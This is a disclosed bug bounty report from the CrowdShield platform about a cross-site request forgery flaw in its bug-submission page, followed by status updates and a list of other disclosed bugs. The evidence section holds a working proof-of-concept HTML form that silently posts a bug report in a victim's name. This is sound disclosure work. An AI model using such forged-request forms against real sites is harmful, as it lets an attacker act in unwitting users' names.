Dashboard

Cross Site Request Forgery

Severity: Medium
Bug ID: 580
Researcher: sandeepv
Status: Disclosed
Submitted: 11/30/2014

Description:

The csrf protection is not implemented in reporting new bug.So the attacker can take advantage to send a csrf link to victim to post a bug to victim. here the attacker can write any abuse about the program to reduce the tester reputation.

Affected URL:

http://crowdshield.com/report_bug_new.php

Affected Params:

Bug submission

Bug Evidence:

<html>
  <body>
    <form action="http://crowdshield.com/report_bug_new.php" method="POST">
      <input type="hidden" name="affected_url" value="sdf" />
      <input type="hidden" name="affected_params" value="dsf" />
      <input type="hidden" name="bug_description" value="dsfdsfffffffffffffffffffffffffffffffffffffffffffffdvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv                             sdggggggggggggggg" />
      <input type="hidden" name="bug_evidence" value="dsf        wertwetrwt" />
      <input type="hidden" name="bug_recommendation" value="dsf      ewrtretret" />
      <input type="hidden" name="bug_category" value="Cross&#32;Site&#32;Scripting" />
      <input type="hidden" name="submit_bug" value="Submit&#32;Bug" />
      <input type="hidden" name="bounty_id" value="12" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


Bug Recommendation:

Implement csrf tokens in both cookies and post request.This restricts some token bypasses

Direct Chat

4
sandeepv 11/30/2014
Message User Image
submitted a Cross Site Request Forgery bug to CrowdShield
CrowdShield 12/01/2014
Message User Image
Acknowledged bug ID: 580 - Cross Site Request Forgery submitted by sandeepv and awarded 15 points!
CrowdShield 12/08/2014
Message User Image
Fixed bug ID: 580 - Cross Site Request Forgery submitted by sandeepv
CrowdShield 06/24/2015
Message User Image
disclosed a Cross Site Request Forgery bug submitted by sandeepv

Pending Bugs

ID Severity Vulnerability User Date Status
692High Authentication Bypass dia2diab 07/01/2015 Disclosed
778High Privilege Escalation poseidon 08/24/2018 Disclosed
641High Privilege Escalation daksh 12/05/2014 Disclosed
744High Privilege Escalation realn0j 09/06/2017 Disclosed
670High Remote Code Execution zoczus 05/06/2015 Disclosed
593Medium Buffer Overflow rockcena 12/01/2014 Disclosed
578Medium Cross Site Request Forgery sandeepv 11/30/2014 Disclosed
580Medium Cross Site Request Forgery sandeepv 11/30/2014 Disclosed
659Medium Reflected Cross Site Scripting pratap 12/16/2014 Disclosed
742Low Application Errors guifre 07/29/2017 Disclosed
724Low Session Security and Cookies testingcs 04/24/2016 Disclosed
706Informational Other zediwon 09/28/2015 Disclosed
707Informational Other behroz 10/06/2015 Disclosed